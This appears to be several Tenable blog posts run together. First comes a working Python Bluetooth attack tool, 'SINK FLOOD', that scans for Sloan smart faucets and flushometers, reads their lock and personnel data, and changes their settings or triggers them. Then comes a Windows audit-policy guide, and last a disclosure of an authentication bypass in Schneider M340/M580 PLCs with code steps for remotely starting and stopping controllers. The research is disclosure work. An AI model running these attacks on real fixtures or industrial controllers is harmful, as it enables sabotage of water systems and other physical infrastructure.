UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c954");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c951");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c952");
LOCK_INFO = (
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY,
)
FAUCET_PHONE_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,

)
UUID_CHARACTERISTIC_OTA_CONTROL = UUID("f7bf3564-fb6d-4e53-88a4-5e37e0326063");
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER = UUID("984227f3-34fc-4045-a5d0-2c581f81a153");
OTA = (
UUID_CHARACTERISTIC_OTA_CONTROL,
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER,
)
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94a");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94b");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94c");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94d");
NOTES = (
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4,
)
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c969");
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c968");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c967");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c961");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c962");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c964");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c963");
DIAG = (
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS,
)
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88361");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c971");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c978");
UUID_CHARACTERISTIC_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88364");
BATTERY_INFO = (
UUID_CHARACTERISTIC_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC,
)
ATTACKS_DICT = {
"0": ("Dispense Water", UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE, "Enter a 1 to begin Dispensing water: "),
"1": ("Flush Toilet", UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE, "Enter a 1 to begin flushing diagnostic: "),
"2": ("Change Faucet Flow Rate", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE, "Enter two digits together, they'll be a float (11 will be 1.1lpm): "),
"3": ("Change Faucet Activation Mode", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION, "Enter a 0 (ondemand) or a 1 (metered) to change the activation mode.: "),
"4": ("Change Faucet OnDemand Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME, "Enter 2 digits (10 = 10 seconds): "),
"5": ("Change Faucet Metered Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME, "Enter 3 digits (120 = 120 seconds): "),
"6": ("Change Sensor Range", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE, "Enter 1 digit (0 to disable sensor): "),
"7": ("Read Maintenance Personnel Info", FAUCET_PHONE_UUIDS, "N/A"),
"8": ("Change Model Number", UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER, "Enter a new model number: "),
"9": ("OTA (doesn't write)", OTA, "N/A"),
"10": ("Read HW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION, "N/A"),
"11": ("Read FW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION, "N/A"),
"12": ("Read AQUIS Info", AQUIS_UUIDS, "N/A"),
"13": ("Read Locking Information", LOCK_INFO, "N/A"),
"14": ("Read Diagnostic Info", DIAG, "N/A"),
"15": ("Read NOTES", NOTES, "N/A"),
"16": ("Write NOTES", NOTES, "Enter something to write to the 4 notes fields:"),
"17": ("Production Enable", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE, "Write something to production enable: "),
"18": ("Adaptive Sensing Enable (gain/sensitivity changes not implemented)", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE, "Write to Adaptive Sensing Enable: "),
"19": ("Read Battery Info", BATTERY_INFO, "N/A"),
}
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
#def handleDiscovery(self, dev):
#if dev
def convert_num_for_writing(text):
if len(text) > 4:
return text.encode()
output = b''
#for letter in text:
# output = output + str(hex(ord(letter)))[2:4].encode()
output = text.encode()
return output
def run_sink_flood(attack, target, p):
attack_name = attack[0]
uuid = attack[1]
text = attack[2]
target_name = target["name"]
if type(uuid) == UUID:
char = p.getCharacteristics(uuid=uuid)
if char[0].supportsRead() and attack_name != "Dispense Water":
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
else:
for i in uuid:
try:
char = p.getCharacteristics(uuid=i)
if char[0].supportsRead():
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
except BTLEGattError:
pass
def menu_pick_attack(target):
for attack in ATTACKS_DICT.keys():
print(f"[{attack}] {ATTACKS_DICT[attack][0]}")
selection = input("Enter a #: ")
return ATTACKS_DICT[selection]
def menu_pick_device(devices):
menu = {}
i = 1
target = None
for dev in devices:
for (adtype, desc, value) in dev.getScanData():
if desc == "Complete Local Name":
if type(value) == str and "FAUCET" in value:
menu["%s" % i] = {"name": value,"dev": dev}
i += 1
options = menu.keys()
if not options:
return None
sorted(options)
for entry in options:
print(f"[{entry}] {menu[entry]['dev'].addr} {menu[entry]['name']} ")
selection = input("Enter a device #: ")
if selection in menu.keys():
target = menu[selection]
return target
def lescan():
scanner = Scanner(1).withDelegate(ScanDelegate())
try:
print(f"[*] scanning for {SCAN_TIMEOUT}")
devices = scanner.scan(SCAN_TIMEOUT)
except BTLEManagementError:
print("[*] Permission to use HCI unavailable, rerun with sudo or as root.")
return
return devices
def main():
print("[*] starting SINK FLOOD Sloan SmartFaucet and SmartFlushometer tool")
while True:
found_devices = lescan()
if found_devices:
target = menu_pick_device(found_devices)
if not target:
continue
p = Peripheral(target['dev'].addr)
#p = Peripheral('08:6b:d7:20:9d:4b')
while target:
attack = menu_pick_attack(target)
run_sink_flood(attack, target, p)
else:
print("[*] target not found. have you tried turning it off and on again?")
continue
else:
print("[*] something's not write. exiting.")
exit()
if __name__ == "__main__":
main()

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit…

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit policy

Tenable.ad can detect Active Directory attacks. To do this, the solution needs to collect security events from the monitored Domain Controllers to be analyzed and correlated. Fortunately, Windows offers built-in audit policy settings to configure which events should be logged. But when testing those options, we noticed surprising behaviors that can lead to missed events.

When you configure your Active Directory domain controllers to log security events to send to your SIEM and raise alerts, you absolutely do not want any regression which would ultimately blind your SOC! In this article we will share technical tips to prevent those unexpected issues.

Disclaimer

This content is based on observations and our interpretation of Microsoft documentation. This article is provided “as-is” and we do not provide any guarantee of correctness nor exhaustiveness and you should only rely on Microsoft guidance.

Introduction

Starting with Windows 2000, Windows offered only simple audit policy settings grouped in nine categories. Those are referred to as “top-level categories” or “basic audit policy” and they are still available in modern versions.

Later, “granular auditing” was introduced with Windows Vista / 2008 (it was configurable only via “auditpol.exe”) and then Windows 7 / 2008 R2 (configurable via GPO). Those are referred to as “sub-level categories” or “advanced audit policy”.

Each basic setting corresponds to a mix of several advanced settings. For example, from Microsoft Advanced security auditing FAQ:

Enabling the single basic account logon setting would be the equivalent of setting all four advanced account logon settings.

The content described in this article was tested on Windows Active Directory domain controllers because those are the most appropriate sources of interest for Active Directory attacks detection, but it should apply to all kinds of Windows machines (servers & workstations).

Surprise #1 — Advanced audit policy fully replaces the basic policy

As soon as we enable even just one advanced audit policy setting, Windows fully switches to advanced policy mode and ignores all existing basic policies (at least on the recent versions of Windows we tested)! Here is a demonstration:

  • Before: the system uses basic settings. We enable “Success, Failure” for “Audit privilege use” (green highlighting) and for other categories the default values apply. This works as expected:
  • After: we only enable one advanced setting (green highlighting). Notice how everything else is not audited anymore, including what we explicitly configured in the basic policy (red highlighting)!

Therefore, you cannot have both and thus when you start using the advanced audit policy, which you should, you are committed to it and should abandon the basic settings to prevent confusion.

Microsoft Advanced security auditing FAQ explains it:

When advanced audit policy settings are applied by using Group Policy, the current computer’s audit policy settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the advanced audit policy settings. […] Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy settings can cause unexpected results in audit reporting.

➡️ Tenable.ad recommendation: use advanced audit policy settings only. Existing basic audit policies should be converted.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #2 — Advanced audit policy may be ignored

However, there are some cases where basic audit policy settings may still take priority over the ones defined in the advanced audit policy. Correctly understanding when and where it could happen is complicated.

As per Microsoft Advanced security auditing FAQ:

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be sure to enable the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” policy setting under “Local Policies\Security Options”. This will prevent conflicts between similar settings by forcing basic security auditing to be ignored.

➡️ Tenable.ad recommendation: once you start using advanced audit policy, we recommend enabling the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” GPO setting to prevent undesired surprises. Its default value being “Enabled”, it should already be effective anyway in the majority of environments.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #3 — Advanced audit policy default values are not respected

As we saw previously, as soon as we enable even just one advanced audit policy setting the system entirely switches to the advanced mode. The question we may have now is how does the system manage the other settings that we did not specify? There are certainly sensible default values, aren’t there? These default values are described in the documentation of each audit policy setting. Let’s read the explanation of the “Audit Logon” setting:

So, here on a server I should expect a default value of “Success, Failure” for the “Audit Logon” setting if not configured, shouldn’t I? Well, we may have a surprise here.

Here is the configuration I applied on my server: I enabled “Success” logging for “Audit Account Lockout” and left “Audit Logon” as “Not Configured”:

However, when looking at the resulting audit policy I notice that “Logon” events are not audited, contrary to their default:

We knew we should not rely on defaults… but this one is really surprising. Of course we made sure that there was no other GPO defining any audit policy setting.

➡️ Tenable.ad recommendation: do not rely on default values for Advanced audit policy settings: explicitly configure the desired value (No Auditing, Success, Failure, or Success and Failure) for each setting of interest.

Be even more careful when migrating from a basic audit policy: make sure to export the resulting policy you had on a normal machine, and convert it to all the appropriate advanced settings to prevent any regression in logging. And as usual with GPOs, especially for security settings, aim to create a single security GPO linked the highest possible, instead of spreading those in many lower-level GPOs.

Surprise #4 — Settings defined by GPOs are not merged

What happens when a machine is covered by several GPOs which define audit policy settings? What if one GPO enables “Success” auditing while another enables “Failure” auditing, is there a merge and would we obtain “Success and Failure”?

Answer: there is no merge at the setting level, and only the value of the GPO with the highest priority is applied. This is actually coherent with the way the Group Policy engine usually works, so not really a surprise, but still to keep in mind.

Here is a demonstration where we want to configure auditing on domain controllers. Two GPOs apply to those servers:

Default Domain Policy” linked at the top of the Active Directory domain

  • Audit Account Lockout” is set to “Success and Failure” (yellow highlighting)
  • Audit Logon” is set to “Success” (red highlighting)

Default Domain Controllers Policy” linked to the “Domain Controllers” organization unit

  • Audit Logoff” is set to “Success and Failure” (blue highlighting)
  • Audit Logon” is set to “Failure” (red highlighting)

Now let’s see the resulting audit policy:

We notice that the conflicting values for “Logon” (red highlighting) were not merged, instead it is the value of the “Default Domain Controllers Policy”. This GPO won as per the usual GPO precedence rules.

We also observe that the values for “Logoff” (blue highlighting) from the “Default Domain Controllers Policy” and “Account Lockout” (yellow highlighting) from the “Default Domain Policy” are both properly applied because those were not in conflict.

Here is how Microsoft Advanced security auditing FAQ explains it:

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is linked at a lower level.

You can also read more about GPO Processing Order in the [MS-GPOL] specification.

➡️ Tenable.ad recommendation: keep in mind that conflicting audit settings are not merged.
If you want to define a domain-wide security auditing GPO, you should ensure that no other GPO at a lower OU level overrides its settings. If necessary, you can set this domain-wide GPO as “Enforced”, even if this is not our preferred option as it can become confusing when managing a large set of GPOs.

If you are only concerned about auditing on domain controllers, you can link a GPO to the “Domain Controllers” organizational unit, as long as there is no domain-level “Enforced” GPO overriding audit policy settings.

Surprise #5 — Only one tool properly shows the effective audit policy

We have just shown that we can have many surprises when configuring auditing, so we really would like a way to see the effective audit policy on a system to confirm that it is as expected.

We could be tempted to use tools which compute the result of GPOs (RSoP), but…

For example, “rsop.msc” does not even seem to support advanced audit policy, which is not too surprising since it is deprecated! See how this section is used in the GPO editor on the right-hand side whereas it is missing in “rsop.msc” on the left-hand side:

And with “gpresult.exe”, if we have basic and advanced audit policies, we will see both: which one applies?

And what about settings that might have been configured locally and not through a GPO (which is not advised…)?

The only supported tool which can properly read the current effective audit policy is “auditpol.exe”, as you may have guessed from our previous screenshots. This is confirmed by a Microsoft blog post. For those who want to dig deeper: “auditpol.exe” calls AuditQuerySystemPolicywhich finally calls the “LsarQueryAuditPolicy” RPC in LSASS.

➡️ Tenable.ad recommendation: only trust the following command to see the effective audit policy on machines: “auditpol.exe /get /category:*”

Surprise bonus — Confusions in the specification

Configuring advanced audit policy in a GPO creates an “audit.csv” file which is described in the [MS-GPAC] Microsoft open specification. We found a mistake in one of the examples:

Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213–69AE-11D9-BED3–505054503030},No Auditing,,0
TEST-MACHINE,System,System Integrity,{0CCE9212–69AE-11D9-BED3–505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3–505054503030},Success and Failure,,3
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3–505054503030},Not specified,,0

On the right-hand columns we have the setting name (such as “No Auditing”, “Success”, etc.) and the corresponding numerical value (0, 1, 3…). We can see that according to the first and last lines the value “0” is associated with both “No Auditing” and “Not specified” which does not make sense. Fortunately the text value is ignored: “value of InclusionSetting is for user readability only and is ignored when the advanced audit policy is applied”.

Also, we found the specification a bit confusing regarding the values of “0” and “4”:

A value of “0”: Indicates that this audit subcategory setting is unchanged.
A value of “4”: Indicates that this audit subcategory setting is set to None.

Our observations actually show that:

  • A value of “0” means that auditing is “disabled”, which corresponds to this in the graphical editor:
  • A value of “4” means that auditing is “not specified”, and thus the default value should apply (except when it does not, as shown before), which would correspond to this in the graphical editor (except that in this case the editor does not even generate a line for this setting in “audit.csv”):

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit… was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)

What you see in the picture above is similar to what you might see at a factory, plant, or inside a machine. At the core of it is Schneider Electric’s Modicon M340 programmable logic controller (PLC). It’s the module at the top right with the ethernet cable plugged in (see picture below), the brains of the operation.

Power supply, PLC, and IO modules attached to backplane.

PLCs are devices that coordinate, monitor, and control industrial processes or machines. They interface with modules (often interconnected through a shared backplane) that allow them to gather data from sensors such as thermostats, pressure, proximity, etc.., and send control signals to equipment such as motors, pumps, and heaters. They are typically hardened in order to survive in rough environments.

PLCs are typically connected to a Supervisory Control and Data Acquisition (SCADA) system or Human Machine Interface (HMI), the user interface for control systems. SCADA controllers can monitor and control multiple subordinate PLCs from one location, and like PLCs, are also monitored and controlled by humans through a connected HMI.

In our test system, we have a Schneider Electric Modicon M340 PLC. It is able to switch on and off outlets via solid state relays and is connected to my network via an ethernet cable, and the engineering station software on my computer is running an HMI which allows me to turn the outlets on and off. Here is the simple HMI I designed for switching the outlets:

Simple Human Machine Interface (HMI)

The connected light is currently on (the yellow circle). Hitting the off button will turn off the actual light and turn the circle on the interface gray.

The engineering station contains programming software (Schneider Electric Control Expert) that allows one to program both the PLC and HMI interfaces.

A PLC is very similar to a virtual machine in its operation; they typically run an underlying operating system or “firmware,” and the control program or “runtime” is started, stopped, and monitored by the underlying operating system.

Ecostruxure Control Expert — Engineering Station Software

These systems often operate in “air-gapped” environments (not connected to the internet) for security purposes, but this is not always the case. Additionally, it is possible for malware (e.g. stuxnet) to make it into the environments when engineers or technicians plug outside equipment into the network, such as laptops for maintenance.

Cyber security in industrial control systems has been severely lacking for decades, mostly due to the false sense of security given by “air-gaps” or segmented networks. Often controllers are not protected by any sort of security at all. Some vendors claim that it is the responsibility of an intermediary system to enforce.

As a result of this somewhat lax standpoint towards security in industrial automation, there have been a few attacks recently that made the news:

Vendors are finally starting to wake up to this, and newer PLCs and software revisions are starting to implement more hardened security all the way down to the controller level. In this blog, I will examine the recent cyber security enhancements inside Schneider Electric’s Modicon M340 PLC.

Internet Connected Devices

The team did a cursory search on BinaryEdge to determine if any of these devices (including the M580, which we later learned was also affected) are connected to the internet. To our surprise, we found quite a few that appear legitimate across several industries including:

  • Water Treatment
  • Oil (production)
  • Gas
  • Solar
  • Hydro
  • Drainage / Levees
  • Dairy
  • Car Washes
  • Cosmetics
  • Fertilizer
  • Parking
  • Plastic Manufacturing
  • Air Filtration

Here is a breakdown of the top 10 affected countries at the time of this writing:

We have alerted ICS-CERT of the presence of these devices prior to disclosure in order to hopefully mitigate any possible attacks.

PLC Engineering Station Connection

The engineering station talks to the PLC primarily via two protocols, FTP, and Modbus. FTP is primarily used to upgrade the firmware on the device. Modbus is used to upload the runtime code to the controller, start/stop the controller runtime, and allow for remote monitoring and control via an HMI.

Modbus can be utilized over various transport layers such as ethernet or serial. In this blog, we will focus on Modbus over TCP/IP.

Modbus is a very simple protocol designed by Schneider Electric for communicating with multiple controllers for the purposes of monitoring and control. Here is the Modbus TCP/IP packet structure:

Modbus packet structure (from Wikipedia)

There are several predefined function codes in modbus, like read/write coils (e.g. for operating relays attached to a PLC) or read/write registers (e.g. to read sensor data). For our controller (and many others), Schneider Electric has a custom function code called Unified Messaging Application Services or UMAS. This function code is 0x5a, or 90. The data bytes contain the underlying UMAS packet data. So in essence, UMAS is tunneled through Modbus.

After the 0x5a there are two bytes, the second of which is the UMAS packet type. In the image above, it is 0x02, which is a READ_ID request. You can find out more information about the UMAS protocol, and a break down of the various message types in this great writeup: http://lirasenlared.blogspot.com/2017/08/the-unity-umas-protocol-part-i.html.

M340 Cyber Security

The recent cyber security enhancements in the M340 firmware (from version 3.01 on 2/2019 and onward) are designed to prevent a remote attacker from executing certain functions on the controller, such as starting and stopping the runtime, reading and writing variables or system bits (to control the program execution), or even uploading a new project to the controller if an application password is configured under the “Project & Controller Protection” tab in the project properties. Due to it being improperly implemented, it is possible to start and stop the controller without this password, as well as perform other control functions protected by the cyber security feature.

Auth Bypass

When connecting to a PLC, the client sends a request to read memory block <redacted> on the PLC before any authentication is performed. This block appears to contain information about the project (such as the project name, version, and file path to the project on the engineering station) and authentication information as well.

<redacted> memory block, containing authentication hashes

Here, “TenableFactory” is the project name. “AGC7MAIWE” is the “Crypted” program and safety project password. The base64 string is used afterwards to verify the application password. This is done as follows:

The actual password is only checked on the client side. To negotiate an authenticated session, or “reservation” first you need to generate a 32 byte random nonce (which is a term for a random number generated once each session), send it to the server, and get one back. This is done through a new type of UMAS packet introduced with the cyber security upgrades, which is <redacted>. I’ve highlighted the nonces (client followed by server) exchanged below:

The next step is to make a reservation using packet type <redacted>. With the new cyber security enhancements, in addition to the computer name of the connecting host, an ASCII sha256 hash is also appended:

This hash is generated as follows:

SHA256 (server_nonce + base64_str + client_nonce)

The base64 string is from the first block <redacted> read and in this case would be:

“pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n”. 

You do not need to know the actual password to generate this SHA256.

The response contains a byte at the end (here it is 0xc9) that needs to be included after the 0x5a in protected requests (such as starting and stopping the PLC runtime).

To generate a request to a protected function (such as start PLC runtime) you first start with the base request:

# start PLC request
to_send = “\x5a” + check_byte + “\x40\xff\x00”

check_byte in this case would be 0xc9 from the reservation request response. You then calculate two hashes:

auth_hash_pre = sha256(hardware_id + client_nonce).digest()
auth_hash_post = sha256(hardware_id + server_nonce).digest()

hardware_id can be obtained by issuing an info request (0x02):

Here the hardware_id is 06 01 03 01.

Once you have the hashes above, you calculate the “auth” hash as follows:

auth_hash = (sha256(auth_hash_pre + to_send + auth_hash_post).digest())

The complete packet (without modbus header) is built as follows:

start_plc_pkt = (“\x5a” + check_byte + “\x38\01” + auth_hash + to_send)

Put everything together in a PoC and you can do things like start and stop controllers remotely:

Proof of Concept in action

A complete PoC (auth_bypass_poc.py) can be found here:

<redacted>

Here is a demo video of the exploit in action, against a model water treatment plant:

Ideally, the controller itself should verify the password. Using a temporal key-exchange algorithm such as Diffie-Hellman to negotiate a pre-shared key, the password could be encrypted using a cipher such as AES and securely shared with the controller for evaluation. Better yet, certificate authentication could be implemented which would allow access to be easily revoked from one central location.

Program and Safety Password

If the Crypted box is checked, a weak, unknown, non-cryptographically sound custom algorithm is used, which reveals the length of the password (the length of hash = length of password).

Program and Safety Protection Password Crypted Option

If the “Crypt” box isn’t checked, this password is in plaintext which is a password disclosure issue.

Here is a reverse engineered implementation I wrote in python:

This appears to be a custom hashing function, as I couldn’t find anything similar to it during my research. There are a couple of issues I’ve noticed. First, the length of the hash matches the length of the password, revealing the password length. Secondly, the hash itself is limited in characters (A-Z and 0–9) which is likely to lead to hash collisions. It is easily possible to find two plaintext messages that hash to the same value, especially with smaller passwords. For example, ‘acq’, ‘asq’, ‘isy’ and ‘qsq’ all hash to ‘5DF’.

Firmware Web Server Errata

Here are a few things I noticed while examining the controller firmware, specifically having to do with the built-in PLC web server they call FactoryCase. This is not enabled by default.

Predictable Web Nonce

The web nonce is calculated by concatenating a few time stamps to a hard coded string. Therefore, it would be possible to predict what values the nonce might be within a certain time frame.

The proper way to calculate a nonce would be to use a proper cryptographic random number generator.

Rot13 Storage of Web Password Data

It appears that the plaintext web username and password is stored somewhere locally on the controller using rot13. Ideally, these should be stored using a salted hash. If the controller was stolen, it might be possible for an attacker to recover this password.

Conclusion

What at the surface looks like authentication, especially when viewing a packet capture, actually isn’t when you dig into the details. Some critical errors were made and not caught during the design and testing of the authentication mechanisms. More oversight and auditing is needed for the security mechanisms in critical products such as this. It’s as critical as the water proofing, heat shielding, and vibration hardening in the hardware. These enhancements should not have made it past critical design review.

This goes back to a core tenet of security that you can’t trust a client. You have to verify every interaction server side. You can not rely on client side software (a.k.a “Engineering Station”) to do the security checks. This verification needs to be done at every level, all the way down to the PLCs.

